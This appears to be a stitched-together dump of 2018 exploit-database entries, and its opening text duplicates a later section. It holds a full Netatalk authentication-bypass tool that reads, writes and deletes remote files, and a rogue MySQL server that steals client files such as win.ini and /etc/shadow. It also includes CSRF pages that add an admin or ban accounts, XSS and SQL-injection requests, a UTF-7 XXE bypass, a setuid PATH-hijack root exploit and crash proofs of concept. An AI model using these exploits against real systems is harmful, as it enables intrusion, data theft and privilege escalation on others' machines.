Run on 2 cores or more, this should work on one core with some modifications.. since you should be able to hit the timing with oplocks too (but I'm lazy).. you should be able to see something like this if it works: https://www.youtube.com/watch?v=x4P2H64GI1o
The easiest way to confirm the bug is to make two local accounts and read the desktop.ini of the other account.
Even without an enumeration vector, this is still bad news, because a lot of document software, like office, will actually keep files in static locations that contain the full path and filesnames of recently opened documents.. thus by reading files like this, you can get filenames of documents created by other users.. the filesystem is a spiderweb and references to user created files can be found everywhere.. so not having an enumeration bug is not that big of a deal.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46028.zip
##
# Exploit Title: Netatalk Authentication Bypass
# Date: 12/20/2018
# Exploit Author: Jacob Baines
# Vendor Homepage: http://netatalk.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netatalk/files/
# Version: Before 3.1.12
# Tested on: Seagate NAS OS (x86_64)
# CVE : CVE-2018-1160
# Advisory: https://www.tenable.com/security/research/tra-2018-48
##
import argparse
import socket
import struct
import sys
# Known addresses:
# This exploit was written against a Netatalk compiled for an
# x86_64 Seagate NAS. The addresses below will need to be changed
# for a different target.
preauth_switch_base = '\x60\xb6\x63\x00\x00\x00\x00\x00' # 0x63b6a0
afp_getsrvrparms = '\x60\xb6\x42\x00\x00\x00\x00\x00' # 0x42b660
afp_openvol = '\xb0\xb8\x42\x00\x00\x00\x00\x00' # 42b8b0
afp_enumerate_ext2 = '\x90\x97\x41\x00\x00\x00\x00\x00' # 419790
afp_openfork = '\xd0\x29\x42\x00\x00\x00\x00\x00' # 4229d0
afp_read_ext = '\x30\x3a\x42\x00\x00\x00\x00\x00' # 423a30
afp_createfile = '\x10\xcf\x41\x00\x00\x00\x00\x00' # 41cf10
afp_write_ext = '\xb0\x3f\x42\x00\x00\x00\x00\x00' # 423fb0
afp_delete = '\x20\x06\x42\x00\x00\x00\x00\x00' # 420620
##
# This is the actual exploit. Overwrites the commands pointer
# with the base of the preauth_switch
##
def do_exploit(sock):
print "[+] Sending exploit to overwrite preauth_switch data."
data = '\x00\x04\x00\x01\x00\x00\x00\x00'
data += '\x00\x00\x00\x1a\x00\x00\x00\x00'
data += '\x01' # attnquant in open sess
data += '\x18' # attnquant size
data += '\xad\xaa\xaa\xba' # overwrites attn_quantum (on purpose)
data += '\xef\xbe\xad\xde' # overwrites datasize
data += '\xfe\xca\x1d\xc0' # overwrites server_quantum
data += '\xce\xfa\xed\xfe' # overwrites the server id and client id
data += preauth_switch_base # overwrite the commands ptr
sock.sendall(data)
# don't really care about the respone
resp = sock.recv(1024)
return
##
# Sends a request to the server.
#
# @param socket the socket we are writing on
# @param request_id two bytes. requests are tracked through the session
# @param address the address that we want to jump to
# @param param_string the params that the address will need
##
def send_request(socket, request_id, address, param_string):
data = '\x00' # flags
data += '\x02' # command
data += request_id
data += '\x00\x00\x00\x00' # data offset
data += '\x00\x00\x00\x90' # cmd length <=== always the same
data += '\x00\x00\x00\x00' # reserved
# ==== below gets copied into dsi->cmd =====
data += '\x11' # use the 25th entry in the pre_auth table. We'll write the function to execute there
data += '\x00' # pad
if (param_string == False):
data += ("\x00" * 134)
else:
data += param_string
data += ("\x00" * (134 - len(param_string)))
data += address # we'll jump to this address
sock.sendall(data)
return
##
# Parses the DSI header. If we don't get the expected request id
# then we bail out.
##
def parse_dsi(payload, expected_req_id):
(flags, command, req_id, error_code, length, reserved) = struct.unpack_from('>BBHIII', payload)
if command != 8:
if flags != 1 or command != 2 or req_id != expected_req_id:
print '[-] Bad DSI Header: %u %u %u' % (flags, command, req_id)
sys.exit(0)
if error_code != 0 and error_code != 4294962287:
print '[-] The server responded to with an error code: ' + str(error_code)
sys.exit(0)
afp_data = payload[16:]
if len(afp_data) != length:
if command != 8:
print '[-] Invalid length in DSI header: ' + str(length) + ' vs. ' + str(len(payload))
sys.exit(0)
else:
afp_data = afp_data[length:]
afp_data = parse_dsi(afp_data, expected_req_id)
return afp_data
##
# List all the volumes on the remote server
##
def list_volumes(sock):
print "[+] Listing volumes"
send_request(sock, "\x00\x01", afp_getsrvrparms, "")
resp = sock.recv(1024)
afp_data = parse_dsi(resp, 1)
(server_time, volumes) = struct.unpack_from('>IB', afp_data)
print "[+] " + str(volumes) + " volumes are available:"
afp_data = afp_data[5:]
for i in range(volumes):
string_length = struct.unpack_from('>h', afp_data)
name = afp_data[2 : 2 + string_length[0]]
print "\t-> " + name
afp_data = afp_data[2 + string_length[0]:]
return
##
# Open a volume on the remote server
##
def open_volume(sock, request, params):
send_request(sock, request, afp_openvol, params)
resp = sock.recv(1024)
afp_data = parse_dsi(resp, 1)
(bitmap, vid) = struct.unpack_from('>HH', afp_data)
return vid
##
# List the contents of a specific volume
##
def list_volume_content(sock, name):
print "[+] Listing files in volume " + name
# open the volume
length = struct.pack("b", len(name))
vid = open_volume(sock, "\x00\x01", "\x00\x20" + length + name)
print "[+] Volume ID is " + str(vid)
# enumerate
packed_vid = struct.pack(">h", vid)
send_request(sock, "\x00\x02", afp_enumerate_ext2, packed_vid + "\x00\x00\x00\x02\x01\x40\x01\x40\x07\xff\x00\x00\x00\x01\x7f\xff\xff\xff\x02\x00\x00\x00")
resp = sock.recv(1024)
afp_data = parse_dsi(resp, 2)
(f_bitmap, d_bitmap, req_count) = struct.unpack_from('>HHH', afp_data)
afp_data = afp_data[6:]
print "[+] Files (%u):" % req_count
for i in range(req_count):
(length, is_dir, pad, something, file_id, name_length) = struct.unpack_from('>HBBHIB', afp_data)
name = afp_data[11:11+name_length]
if is_dir:
print "\t[%u] %s/" % (file_id, name)
else:
print "\t[%u] %s" % (file_id, name)
afp_data = afp_data[length:]
##
# Read the contents of a specific file.
##
def cat_file(sock, vol_name, file_name):
print "[+] Cat file %s in volume %s" % (file_name, vol_name)
# open the volume
vol_length = struct.pack("b", len(vol_name))
vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
print "[+] Volume ID is " + str(vid)
# open fork
packed_vid = struct.pack(">h", vid)
file_length = struct.pack("b", len(file_name))
send_request(sock, "\x00\x02", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
resp = sock.recv(1024)
afp_data = parse_dsi(resp, 2)
(f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
print "[+] Fork ID: %s" % (fork_id)
# read file
packed_fork = struct.pack(">h", fork_id)
send_request(sock, "\x00\x03", afp_read_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x03\x00")
resp = sock.recv(1024)
afp_data = parse_dsi(resp, 3)
print "[+] File contents:"
print afp_data
##
# Create a file on the remote volume
##
def write_file(sock, vol_name, file_name, data):
print "[+] Writing to %s in volume %s" % (file_name, vol_name)
# open the volume
vol_length = struct.pack("B", len(vol_name))
vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
print "[+] Volume ID is " + str(vid)
# create the file
packed_vid = struct.pack(">H", vid)
file_length = struct.pack("B", len(file_name))
send_request(sock, "\x00\x02", afp_createfile, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
resp = sock.recv(1024)
afp_data = parse_dsi(resp, 2)
if len(afp_data) != 0:
sock.recv(1024)
# open fork
packed_vid = struct.pack(">H", vid)
file_length = struct.pack("B", len(file_name))
send_request(sock, "\x00\x03", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
resp = sock.recv(1024)
afp_data = parse_dsi(resp, 3)
(f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
print "[+] Fork ID: %s" % (fork_id)
# write
packed_fork = struct.pack(">H", fork_id)
data_length = struct.pack(">Q", len(data))
send_request(sock, "\x00\x04", afp_write_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + data_length + data)
#resp = sock.recv(1024)
sock.send(data + ("\x0a"*(144 - len(data))))
resp = sock.recv(1024)
afp_data = parse_dsi(resp, 4)
print "[+] Fin"
##
# Delete a file on the remote volume
##
def delete_file(sock, vol_name, file_name):
print "[+] Deleting %s from volume %s" % (file_name, vol_name)
# open the volume
vol_length = struct.pack("B", len(vol_name))
vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
print "[+] Volume ID is " + str(vid)
# delete the file
packed_vid = struct.pack(">H", vid)
file_length = struct.pack("B", len(file_name))
send_request(sock, "\x00\x02", afp_delete, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
resp = sock.recv(1024)
afp_data = parse_dsi(resp, 2)
print "[+] Fin"
##
##
## Main
##
##
top_parser = argparse.ArgumentParser(description='I\'m a little pea. I love the sky and the trees.')
top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="548")
top_parser.add_argument('-lv', '--list-volumes', action="store_true", dest="lv", help="List the volumes on the remote target.")
top_parser.add_argument('-lvc', '--list-volume-content', action="store_true", dest="lvc", help="List the content of a volume.")
top_parser.add_argument('-c', '--cat', action="store_true", dest="cat", help="Dump contents of a file.")
top_parser.add_argument('-w', '--write', action="store_true", dest="write", help="Write to a new file.")
top_parser.add_argument('-f', '--file', action="store", dest="file", help="The file to operate on")
top_parser.add_argument('-v', '--volume', action="store", dest="volume", help="The volume to operate on")
top_parser.add_argument('-d', '--data', action="store", dest="data", help="The data to write to the file")
top_parser.add_argument('-df', '--delete-file', action="store_true", dest="delete_file", help="Delete a file")
args = top_parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"
do_exploit(sock)
if args.lv:
list_volumes(sock)
elif args.lvc and args.volume != None:
list_volume_content(sock, args.volume)
elif args.cat and args.file != None and args.volume != None:
cat_file(sock, args.volume, args.file)
elif args.write and args.volume != None and args.file != None and args.data != None:
if len(args.data) > 144:
print "This implementation has a max file writing size of 144"
sys.exit(0)
write_file(sock, args.volume, args.file, args.data)
elif args.delete_file and args.volume != None and args.file != None:
delete_file(sock, args.volume, args.file)
else:
print("Bad args")
sock.close()
# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF
# Date: 12/20/2018
# Exploit Author: mqt
# Vendor Homepage: http://http://www.zeuscart.com/
# Version: Zeus Cart 4.0 CSRF
1. Vulnerability Description
Due to the form not being validated, ZeusCart4.0 suffers from a Cross
Site Request Forgery vulnerability, which means an attacker can
perform actions on behalf of a victim, by having the victim visit an
attacker controlled site.
In this case, the attacker is able to "deactivate" any customer
accounts, which means that the account is banned and cannot login.
Proof of Concept:
<html>
<body>
<img style="display:none"msrc="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
</body>
</html>
# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage: https://github.com/wstmall/wstmart/
# Software Link: http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE: CVE-2018-20367
# 0x01 stored XSS (PoC)
Function point: mall some commodity details - commodity consultation
poc:
POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454
goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E
#!/usr/bin/env python
#coding: utf8
import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlers
PORT = 3306
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
tmp_format
)
filelist = (
# r'c:\boot.ini',
r'c:\windows\win.ini',
# r'c:\windows\system32\drivers\etc\hosts',
# '/etc/passwd',
# '/etc/shadow',
)
#================================================
#=======No need to change after this lines=======
#================================================
__author__ = 'Gifts'
def daemonize():
import os, warnings
if os.name != 'posix':
warnings.warn('Cant create daemon on non-posix system')
return
if os.fork(): os._exit(0)
os.setsid()
if os.fork(): os._exit(0)
os.umask(0o022)
null=os.open('/dev/null', os.O_RDWR)
for i in xrange(3):
try:
os.dup2(null, i)
except OSError as e:
if e.errno != 9: raise
os.close(null)
class LastPacket(Exception):
pass
class OutOfOrder(Exception):
pass
class mysql_packet(object):
packet_header = struct.Struct('<Hbb')
packet_header_long = struct.Struct('<Hbbb')
def __init__(self, packet_type, payload):
if isinstance(packet_type, mysql_packet):
self.packet_num = packet_type.packet_num + 1
else:
self.packet_num = packet_type
self.payload = payload
def __str__(self):
payload_len = len(self.payload)
if payload_len < 65536:
header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)
else:
header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)
result = "{0}{1}".format(
header,
self.payload
)
return result
def __repr__(self):
return repr(str(self))
@staticmethod
def parse(raw_data):
packet_num = ord(raw_data[0])
payload = raw_data[1:]
return mysql_packet(packet_num, payload)
class http_request_handler(asynchat.async_chat):
def __init__(self, addr):
asynchat.async_chat.__init__(self, sock=addr[0])
self.addr = addr[1]
self.ibuffer = []
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'Auth'
self.logined = False
self.push(
mysql_packet(
0,
"".join((
'\x0a', # Protocol
'3.0.0-Evil_Mysql_Server' + '\0', # Version
#'5.1.66-0+squeeze1' + '\0',
'\x36\x00\x00\x00', # Thread ID
'evilsalt' + '\0', # Salt
'\xdf\xf7', # Capabilities
'\x08', # Collation
'\x02\x00', # Server Status
'\0' * 13, # Unknown
'evil2222' + '\0',
))
)
)
self.order = 1
self.states = ['LOGIN', 'CAPS', 'ANY']
def push(self, data):
log.debug('Pushed: %r', data)
data = str(data)
asynchat.async_chat.push(self, data)
def collect_incoming_data(self, data):
log.debug('Data recved: %r', data)
self.ibuffer.append(data)
def found_terminator(self):
data = "".join(self.ibuffer)
self.ibuffer = []
if self.state == 'LEN':
len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
if len_bytes < 65536:
self.set_terminator(len_bytes)
self.state = 'Data'
else:
self.state = 'MoreLength'
elif self.state == 'MoreLength':
if data[0] != '\0':
self.push(None)
self.close_when_done()
else:
self.state = 'Data'
elif self.state == 'Data':
packet = mysql_packet.parse(data)
try:
if self.order != packet.packet_num:
raise OutOfOrder()
else:
# Fix ?
self.order = packet.packet_num + 2
if packet.packet_num == 0:
if packet.payload[0] == '\x03':
log.info('Query')
filename = random.choice(filelist)
PACKET = mysql_packet(
packet,
'\xFB{0}'.format(filename)
)
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'File'
self.push(PACKET)
elif packet.payload[0] == '\x1b':
log.info('SelectDB')
self.push(mysql_packet(
packet,
'\xfe\x00\x00\x02\x00'
))
raise LastPacket()
elif packet.payload[0] in '\x02':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
elif packet.payload == '\x00\x01':
self.push(None)
self.close_when_done()
else:
raise ValueError()
else:
if self.sub_state == 'File':
log.info('-- result')
log.info('Result: %r', data)
if len(data) == 1:
self.push(
mysql_packet(packet, '\0\0\0\x02\0\0\0')
)
raise LastPacket()
else:
self.set_terminator(3)
self.state = 'LEN'
self.order = packet.packet_num + 1
elif self.sub_state == 'Auth':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
else:
log.info('-- else')
raise ValueError('Unknown packet')
except LastPacket:
log.info('Last packet')
self.state = 'LEN'
self.sub_state = None
self.order = 0
self.set_terminator(3)
except OutOfOrder:
log.warning('Out of order')
self.push(None)
self.close_when_done()
else:
log.error('Unknown state')
self.push('None')
self.close_when_done()
class mysql_listener(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
if not sock:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
try:
self.bind(('', PORT))
except socket.error:
exit()
self.listen(5)
def handle_accept(self):
pair = self.accept()
if pair is not None:
log.info('Conn from: %r', pair[1])
tmp = http_request_handler(pair)
z = mysql_listener()
daemonize()
asyncore.loop()
The bug is in “MsiAdvertiseProduct”
Calling this function will result in a file copy by the installer service.
This will copy an arbitrary file that we can control with the first parameter into c:\windows\installer … a check gets done while impersonating, but using junctions there is still a TOCTOU .. meaning we can get it to copy any file as SYSTEM, and the destination file will always be readable. This results an in arbitrary file read vulnerability.
To reproduce:
Make sure to copy both readfile.exe and “file” (found under folder PoC-Files)… and put them in the same directory.
Usage: readfile.exe targetfile (where targetfile is the file to read, IE: “readfile.exe c:\users\test\desktop\desktop.ini”)
Run on 2 cores or more, this should work on one core with some modifications.. since you should be able to hit the timing with oplocks too (but I'm lazy).. you should be able to see something like this if it works: https://www.youtube.com/watch?v=x4P2H64GI1o
The easiest way to confirm the bug is to make two local accounts and read the desktop.ini of the other account.
Even without an enumeration vector, this is still bad news, because a lot of document software, like office, will actually keep files in static locations that contain the full path and filesnames of recently opened documents.. thus by reading files like this, you can get filenames of documents created by other users.. the filesystem is a spiderweb and references to user created files can be found everywhere.. so not having an enumeration bug is not that big of a deal.
If shadow copies are enabled you can obviously steal the SAM and SYSTEM hive I assume...
Maybe there's some other use-cases.. but I'm not very smart, so I don't know.
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46040.rar
# Exploit Title: FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection
# Google Dork: N/A
# Date: 2018-12-22
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: http://frontaccounting.com/
# Software Link: https://sourceforge.net/projects/frontaccounting/
# Version: 2.4.5
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit, Kali linux X64
# CVE : N/A
# ========================= Vendor Summery =====================
#
# FrontAccounting (FA) is a professional web-based Accounting system for
# the entire ERP chain written in PHP, using MySQL. FA is multilingual and
# multicurrency.
#
# ======================== Vulnerability Description ===============
#
# the parameter "filterType" in /attachments.php is Vulnerable to Time
# Based Blind SQL Injection.
#
# ======================== PoC =======================================
POST /frontaccounting/admin/attachments.php? HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/frontaccounting/admin/attachments.php?
Content-Type: application/x-www-form-urlencoded
Content-Length: 367
DNT: 1
Connection: close
Cookie:
Upgrade-Insecure-Requests: 1
user_name_entry_field=admin&password=1234&company_login_name=0&ui_mode=1&SubmitUser=%A0%A0Login+--%3E%A0%A0&_random=831749.090143524&_token=1RJ9WhkRWKszXu-uPm6DTQxx&_confirmed=&_modified=0&_focus=filterType&ADD_ITEM=Add+new&description=&trans_no=&filterType=(select*from(select(sleep(20)))a)&_focus=filterType&_modified=0&_confirmed=&_token=Om-2mt32ZC3UkLAuzPwoFgxx
# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: 2018-12-22
# Vendor Homepage: https://angryip.org/
# Software Link : https://angryip.org/download/
# Tested Version: 3.5.3 (latest version)
# Tested on: Kali linux
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python angryip.py
# 2.- Open Xangry.txt and copy content to clipboard
# 3.- Open Angry IP Scanner
# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports",
# 5.- Paste ClipBoard on "Port selection", and click on "OK",
# 6.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 384
crash = buffer + "BBBB" + "CCCC"
f = open("Xangry.txt", "w")
f.write(crash)
f.close()
# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage:https://github.com/wstmall/wstmart/
# Software Link:http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE :CVE-2018-19138
# 0x02 CSRF PoC
# 18/5000
# Function point: background management - staff management - login account
# poc:
# 1234.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<form action="http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/index.php/admin/staffs/add.html" id="test" name='test' method="POST">
<input type="hidden" name='staffId' value="" />
<input type="hidden" name='loginName' value="" />
<input type="hidden" name='staffPhoto' value="" />
<input type="hidden" name='loginPwd' value="" />
<input type="hidden" name='staffName' value="" />
<input type="hidden" name='staffNo' value="" />
<input type="hidden" name='RoleId' value="" />
<input type="hidden" name='staffPhone' value="" />
<input type="hidden" name='wxOpenId' value="" />
<input type="hidden" name='workStatus' value="" />
<input type="hidden" name='staffStatus' value="" />
</form>
<script type="text/javascript">
test.staffId.value="0";
test.loginName.value="admin3";
test.staffPhoto.value="";
test.loginPwd.value="admin3";
test.staffName.value="admin3";
test.staffNo.value="";
test.RoleId.value="0";
test.staffPhone.value="";
test.wxOpenId.value="";
test.workStatus.value="1";
test.staffStatus.value="1";
test.submit();
</script>
</body>
</html>
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46051.zip
Password: infected
# Product Description
PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc.
# Vulnerabilities List
One vulnerability was identified within the PhpSpreadsheet library.
# Affected Version
Versions <=1.5.0
# Solution
Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan.
This vulnerability is described in the following section.
# XML External Entity (XXE) Injection
The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem.
# Vulnerability Details
CVE ID: CVE-2018-19277
Access Vector: Network
Security Risk: High
Vulnerability: CWE-611
CVSS Base Score: 7.7
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload:
```
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://127.0.0.1:8080/ext.dtd">%aaa;%ccc;%ddd;]>
```
The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped.
When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed.
import socket
import struct
import sys
if len(sys.argv) != 3:
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))
dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload
dsi_header = "\x00" # "request" flag
dsi_header += "\x04" # open session command
dsi_header += "\x00\x01" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(dsi_opensession))
dsi_header += "\x00\x00\x00\x00" # reserved
dsi_header += dsi_opensession
sock.sendall(dsi_header)
resp = sock.recv(1024)
print "[+] Open Session complete"
afp_command = "\x01" # invoke the second entry in the table
afp_command += "\x00" # protocol defined padding
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
afp_command += struct.pack("Q", 0x4295f0) # address to jump to
dsi_header = "\x00" # "request" flag
dsi_header += "\x02" # "AFP" command
dsi_header += "\x00\x02" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(afp_command))
dsi_header += '\x00\x00\x00\x00' # reserved
dsi_header += afp_command
print "[+] Sending get server info request"
sock.sendall(dsi_header)
resp = sock.recv(1024)
print resp
print "[+] Fin."
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root.
## Environment
CentOS Linux release 7.4.1708 (Core)
3.10.0-693.17.1.el7.x86_64
RPM info
```
Name : keybase
Version : 2.8.0.20181017144746.3efc4cbf3c
Release : 1
Architecture: x86_64
Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
Group : Unspecified
Size : 273302678
License : BSD
Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
Source RPM : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm
Build Date : Wed 17 Oct 2018 10:54:47 AM EDT
Build Host : 6ae61e160e87
Relocations : (not relocatable)
Summary : Keybase command line client
Description :
Keybase command line client
```
An unprivileged user named user1 is used for this PoC.
## Steps to reproduce
1) Display privileges of user 1 - execute the id command
```
[user1@localhost woot]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```
2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.
```
cat >fusermount.c<<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv)
{
setreuid(0,0);
system("/usr/bin/touch /w00t");
return(0);
}
EOF
``
3) Compile fusermount.c
```
gcc -Wall fusermount.c -o fusermount
```
4) Verify that /w00t does not exist.
```
[user1@localhost woot]$ ls -ld /w00t
ls: cannot access /w00t: No such file or directory
```
5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root.
```
env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
```
6) Enter the control-c sequence to kill the application.
```
[user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
^C
```
7) Verify that /w00t exists
```
[user1@localhost woot]$ ls -ld /w00t
-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t
[user1@localhost woot]$
```
## Impact
Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system.
<!---
title: Crash Chrome 70 with the SQLite Magellan bug
categories: chrome
permalink: /sqlitebug/
layout: post
---!>
<p>This proof-of-concept crashes the Chrome renderer process using <a href="https://blade.tencent.com/magellan/index_en.html">Tencent Blade Team's Magellan SQLite3 bug</a>. It's based on <a href="https://www.sqlite.org/src/info/940f2adc8541a838">a SQLite test case</a> from the commit that fixed the bug.</p>
<p><span id="prompttext">If you're using Chrome 70 or below, tap the button below to crash this page:</span></p>
<button onClick="crash()" style="font-size: 150%">Crash this page</button>
<p>Your browser's user agent is: <span id="browserUserAgent">not available without JavaScript. Turn it on!</span></p>
<p><a href="https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html">Source code for this page on GitHub</a>.</p>
<h1>Sign up for more information</h1>
<p>I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:</p>
<form action="https://worthdoingbadly.us18.list-manage.com/subscribe/post?u=3f9820ca33ce6a7b1e682c9ac&id=014e6793b7&SIGNUP=inline-sqlitebug" method="post" id="mc-embedded-subscribe-form-inline" name="mc-embedded-subscribe-form-inline" class="validate" target="_blank">
<input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL" placeholder="Email">
<div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_3f9820ca33ce6a7b1e682c9ac_014e6793b7" tabindex="-1" value=""></div>
<input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button">
</form>
<h1>What's supposed to happen?</h1>
<p>After you press the button, the page should crash:</p>
<p><img src="/assets/blog/sqlitebug/sqlite_cropped.png" alt="screenshot"></p>
<p>On Android 5.1, I get a segfault in memcpy:</p>
<pre style="font-size: 10px">
F/libc ( 3801): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe0ddb457 in tid 3854 (Database thread)
I/DEBUG ( 142): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 142): Build fingerprint: 'google/nakasi/grouper:5.1/LMY47D/1743759:user/release-keys'
I/DEBUG ( 142): Revision: '0'
I/DEBUG ( 142): ABI: 'arm'
